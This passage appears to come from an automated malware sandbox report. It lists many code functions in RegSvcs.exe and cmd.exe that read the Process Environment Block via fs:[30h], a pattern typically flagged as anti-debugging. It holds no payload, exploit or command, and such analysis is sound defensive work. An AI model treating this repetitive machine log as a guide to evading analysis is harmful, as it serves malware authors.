          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0103740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0103740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0103740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01038CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_010214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0103070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0103070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01038F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0101FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0101FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01038ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0089B5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0367070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0367070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0366131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03675BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0365D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0366138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03627794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03627794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03627794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0365B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0365B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03634257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0365FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0365FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03670EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03670EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03670EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_036246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03623540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0362A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_036341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03658DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03671074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03662073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
